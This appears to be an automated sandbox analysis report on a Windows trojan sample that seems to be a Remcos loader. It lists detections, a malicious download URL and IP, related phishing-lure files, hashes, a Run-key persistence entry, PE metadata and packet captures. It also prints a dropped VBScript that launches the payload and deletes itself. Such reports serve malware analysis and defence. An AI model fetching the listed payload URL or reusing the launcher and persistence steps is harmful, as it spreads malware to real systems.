External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery22	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
4AtUJN8Hdu.exe	36%	Virustotal		Browse
4AtUJN8Hdu.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\win.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\win.exe	36%	Virustotal		Browse
C:\Users\user\AppData\Roaming\win.exe	43%	ReversingLabs	Win32.Trojan.Razy

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
mtspsmjeli.sch.id	12%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin	15%	Virustotal		Browse
http://mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mtspsmjeli.sch.id	103.150.60.242	true	true	12%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin	true	15%, Virustotal, Browse Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.150.60.242	unknown	unknown		45325	PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaID	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356514
Start date:	23.02.2021
Start time:	09:15:52
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	4AtUJN8Hdu.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	33
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@11/3@1/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 11.1% (good quality ratio 1.7%) Quality average: 6.3% Quality standard deviation: 12.8%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 131.253.33.200, 13.107.22.200, 93.184.220.29, 104.42.151.234, 51.11.168.160, 104.43.139.144, 92.122.145.220, 23.218.208.56, 2.20.142.209, 2.20.142.210, 51.103.5.186, 51.104.139.180, 92.122.213.247, 92.122.213.194, 20.54.26.129, 52.155.217.156 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, cs9.wac.phicdn.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:20:29	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run win "C:\Users\user\AppData\Roaming\win.exe"
09:20:37	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run win "C:\Users\user\AppData\Roaming\win.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
103.150.60.242	XP 6.xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/CUN.exe
	Emirates NDB bank_Remittance.xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/AWT.exe
	TT.xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/TT_2021_Remcos%20v2_DDoOoaFhuj99.bin
	w0JlVAbpIT.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/wazzyfeb2021_XEeStqfpQ150.bin
	3661RJTi5M.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
	TgrhfQLDyB.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/XP_remcos%202021_HzUYr10.bin
	Bjdl7RO0K8.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/wazzyfeb2021_XEeStqfpQ150.bin
	4hW0TZqN01.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/Mekino_nanocore_RYgvWj50.bin
	vTQWcy77WI.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
	LdOgPDsMEf.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/XP_remcos%202021_HzUYr10.bin
	6QlgtXWPBZ.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
	OXplew3YfS.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/Eric_2021_XfqsmM221.bin
	pWokqkAwi2.exe	Get hash	malicious	Browse	mtspsmjeli.sch.id/cl/VK_Remcos%20v2_AxaGIU151.bin
	FT102038332370.xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/OSE.exe
	UOB bank_Remittance_Form.xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/AQT.exe
	Payment Confirmation .xlsx	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/AET.exe
	Sales Acknowledgement SA00004804.doc	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/UDI.exe
	14 nights highlight tour.doc	Get hash	malicious	Browse	mtspsmjeli.sch.id/Img/WAH.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
mtspsmjeli.sch.id	XP 6.xlsx	Get hash	malicious	Browse	103.150.60.242
	Emirates NDB bank_Remittance.xlsx	Get hash	malicious	Browse	103.150.60.242
	TT.xlsx	Get hash	malicious	Browse	103.150.60.242
	w0JlVAbpIT.exe	Get hash	malicious	Browse	103.150.60.242
	3661RJTi5M.exe	Get hash	malicious	Browse	103.150.60.242
	TgrhfQLDyB.exe	Get hash	malicious	Browse	103.150.60.242
	Bjdl7RO0K8.exe	Get hash	malicious	Browse	103.150.60.242
	4hW0TZqN01.exe	Get hash	malicious	Browse	103.150.60.242
	vTQWcy77WI.exe	Get hash	malicious	Browse	103.150.60.242
	LdOgPDsMEf.exe	Get hash	malicious	Browse	103.150.60.242
	6QlgtXWPBZ.exe	Get hash	malicious	Browse	103.150.60.242
	OXplew3YfS.exe	Get hash	malicious	Browse	103.150.60.242
	pWokqkAwi2.exe	Get hash	malicious	Browse	103.150.60.242
	FT102038332370.xlsx	Get hash	malicious	Browse	103.150.60.242
	UOB bank_Remittance_Form.xlsx	Get hash	malicious	Browse	103.150.60.242
	Payment Confirmation .xlsx	Get hash	malicious	Browse	103.150.60.242
	Sales Acknowledgement SA00004804.doc	Get hash	malicious	Browse	103.150.60.242
	14 nights highlight tour.doc	Get hash	malicious	Browse	103.150.60.242

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
PC24NET-AS-IDPTPC24TelekomunikasiIndonesiaID	XP 6.xlsx	Get hash	malicious	Browse	103.150.60.242
	Emirates NDB bank_Remittance.xlsx	Get hash	malicious	Browse	103.150.60.242
	TT.xlsx	Get hash	malicious	Browse	103.150.60.242
	w0JlVAbpIT.exe	Get hash	malicious	Browse	103.150.60.242
	3661RJTi5M.exe	Get hash	malicious	Browse	103.150.60.242
	TgrhfQLDyB.exe	Get hash	malicious	Browse	103.150.60.242
	Bjdl7RO0K8.exe	Get hash	malicious	Browse	103.150.60.242
	4hW0TZqN01.exe	Get hash	malicious	Browse	103.150.60.242
	vTQWcy77WI.exe	Get hash	malicious	Browse	103.150.60.242
	LdOgPDsMEf.exe	Get hash	malicious	Browse	103.150.60.242
	6QlgtXWPBZ.exe	Get hash	malicious	Browse	103.150.60.242
	OXplew3YfS.exe	Get hash	malicious	Browse	103.150.60.242
	pWokqkAwi2.exe	Get hash	malicious	Browse	103.150.60.242
	FT102038332370.xlsx	Get hash	malicious	Browse	103.150.60.242
	UOB bank_Remittance_Form.xlsx	Get hash	malicious	Browse	103.150.60.242
	Payment Confirmation .xlsx	Get hash	malicious	Browse	103.150.60.242
	Sales Acknowledgement SA00004804.doc	Get hash	malicious	Browse	103.150.60.242
	14 nights highlight tour.doc	Get hash	malicious	Browse	103.150.60.242

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\install.vbs Download File
Process:	C:\Users\user\Desktop\4AtUJN8Hdu.exe
File Type:	data
Category:	modified
Size (bytes):	400
Entropy (8bit):	3.4932995649361622
Encrypted:	false
SSDEEP:	12:4D8o++ugypjBQMBvFQ4lOAMJnAGF0M/0aimi:4Dh+S0FNOj7F0Nait
MD5:	69339977F20CBF10E59B9609355FDAD1
SHA1:	28275BF11AF1EAA7B41AB836BBFD85F9A59C99EF
SHA-256:	180976FE30D7F115FF9112B387D7CC4B533B2E58EDCDC6EFA18121C590C59D9A
SHA-512:	17A8ABD09E280000D4CADB466777CDF83387D7021572FFC8360A01CDD2B13FC5A81351FA2708AC74B441B0C7DE2B0A9ACF0CF28EDCAE7C12101268C541288764
Malicious:	false
Reputation:	low
Preview:	W.S.c.r.i.p.t...S.l.e.e.p. .1.0.0.0...S.e.t. .f.s.o. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".S.c.r.i.p.t.i.n.g...F.i.l.e.S.y.s.t.e.m.O.b.j.e.c.t.".)...C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...R.u.n. .".c.m.d. ./.c. .".".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.w.i.n...e.x.e.".".".,. .0...f.s.o...D.e.l.e.t.e.F.i.l.e.(.W.s.c.r.i.p.t...S.c.r.i.p.t.F.u.l.l.N.a.m.e.).

C:\Users\user\AppData\Roaming\win.exe Download File
Process:	C:\Users\user\Desktop\4AtUJN8Hdu.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	5.230002912507913
Encrypted:	false
SSDEEP:	1536:gJ2bp/9/xkVSY5anKZRaTa5BXJMtpEL2bp/9/x:0J6Krd5BkWL
MD5:	D7E81ABCE9332847471B89E50B241172
SHA1:	A6455D3A4FB9C2E5627DCBF46702A4E16C2492DA
SHA-256:	6141EFB6F1598E2205806C5A788E61C489440DFC942984EE1688BB68AD0F18DF
SHA-512:	5847AEDD8D283CEA10D87C290ABCA0CF0B4D2C1BBDC102236675539A92FA02C10A756CF61CC55390A6D89CD30951876971C8791F75E8F368A7FAE7324C9A112C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 36%, Browse Antivirus: ReversingLabs, Detection: 43%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.x.....................\...T...%.......Rich............................PE..L.....S.................@...p......x........P....@.................................ds.......................................B..(........0..................................................................8... ....................................text....6.......@.................. ..`.data...`%...P.......P..............@....rsrc....0.......@...`..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\win.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\4AtUJN8Hdu.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.230002912507913
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	4AtUJN8Hdu.exe
File size:	106496
MD5:	d7e81abce9332847471b89e50b241172
SHA1:	a6455d3a4fb9c2e5627dcbf46702a4e16c2492da
SHA256:	6141efb6f1598e2205806c5a788e61c489440dfc942984ee1688bb68ad0f18df
SHA512:	5847aedd8d283cea10d87c290abca0cf0b4d2c1bbdc102236675539a92fa02c10a756cf61cc55390a6d89cd30951876971c8791f75e8f368a7fae7324c9a112c
SSDEEP:	1536:gJ2bp/9/xkVSY5anKZRaTa5BXJMtpEL2bp/9/x:0J6Krd5BkWL
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.x.....................\...T...%.......Rich............................PE..L......S.................@...p......x........P....@

File Icon


Icon Hash:	d8d490d4c4bcdef9

Static PE Info

General
Entrypoint:	0x401378
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x538FC9BC [Thu Jun 5 01:37:00 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	5fb04c04dc9621084e24b4642ca2fed6

Entrypoint Preview

Instruction
push 004101B4h
call 00007F1ED08C0F45h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi+0BC44A38h], al
jnl 00007F1ED08C0F8Dh
dec esi
mov ecx, F0416DF8h
in eax, dx
xchg eax, edi
adc eax, dword ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx+66h], al
jbe 00007F1ED08C0FBBh
insb
jnc 00007F1ED08C0FB7h
outsb
jc 00007F1ED08C0FC1h
outsd
imul ax, word ptr [eax], 0000h
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
or eax, 09262CFCh
aad FDh
inc ax
mov si, fs
ror dh, 1
inc eax
mov dh, 29h
cmp esp, dword ptr [edx+55C5B56Bh]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x14214	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x18000	0x309c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x238	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x114	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x136dc	0x14000	False	0.342736816406	data	5.75844927708	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x15000	0x2560	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x18000	0x309c	0x4000	False	0.113586425781	data	3.24841708527	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x193f4	0x1ca8	data
RT_ICON	0x1874c	0xca8	data
RT_ICON	0x183e4	0x368	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x183b4	0x30	data
RT_VERSION	0x18150	0x264	data	Hungarian	Hungary

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaStrI4, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaLateMemSt, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaVarTstEq, __vbaObjVar, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaVarDup, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x040e 0x04b0
InternalName	Ridgepieceudtrreu
FileVersion	1.00
CompanyName	ColdStone
Comments	ColdStone
ProductName	ColdStone
ProductVersion	1.00
OriginalFilename	Ridgepieceudtrreu.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
Hungarian	Hungary

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 09:20:25.306189060 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:25.546380997 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:25.546622038 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:25.547291040 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:25.785558939 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:25.785808086 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:25.785835981 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:25.785864115 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:25.785896063 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:25.785933971 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:25.785979986 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:25.785988092 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:25.786012888 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:25.786014080 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:25.786031961 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:25.786050081 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:25.786082983 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:25.786094904 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:25.786125898 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:25.786132097 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:25.786165953 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:25.786194086 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.024648905 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.024682045 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.024698019 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.024723053 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.024744034 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.024766922 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.024792910 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.024822950 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.024846077 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.024872065 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.024893999 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.024916887 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.024924040 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.024940968 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.024965048 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.024967909 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.024969101 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.024991989 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.025003910 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.025022984 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.025043964 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.025049925 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.025073051 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.025084019 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.025094032 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.025118113 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.025125027 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.025166988 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.263392925 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.263434887 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.263458967 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.263484001 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.263510942 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.263537884 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.263562918 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.263591051 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.263614893 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.263617992 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.263648987 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.263674974 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.263675928 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.263703108 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.263725996 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.263734102 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.263761044 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.263771057 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.263787985 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.263813972 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.263830900 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.263887882 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.264000893 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.264030933 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.264058113 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.264084101 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.264087915 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.264111042 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.264141083 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.264162064 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.264168024 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.264197111 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.264195919 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.264225006 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.264246941 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.264348984 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.264554977 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.264586926 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.264614105 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.264641047 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.264640093 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.264668941 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.264693975 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.264704943 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.264722109 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.264746904 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.264771938 CET	80	49744	103.150.60.242	192.168.2.5
Feb 23, 2021 09:20:26.264799118 CET	49744	80	192.168.2.5	103.150.60.242
Feb 23, 2021 09:20:26.264800072 CET	80	49744	103.150.60.242	192.168.2.5
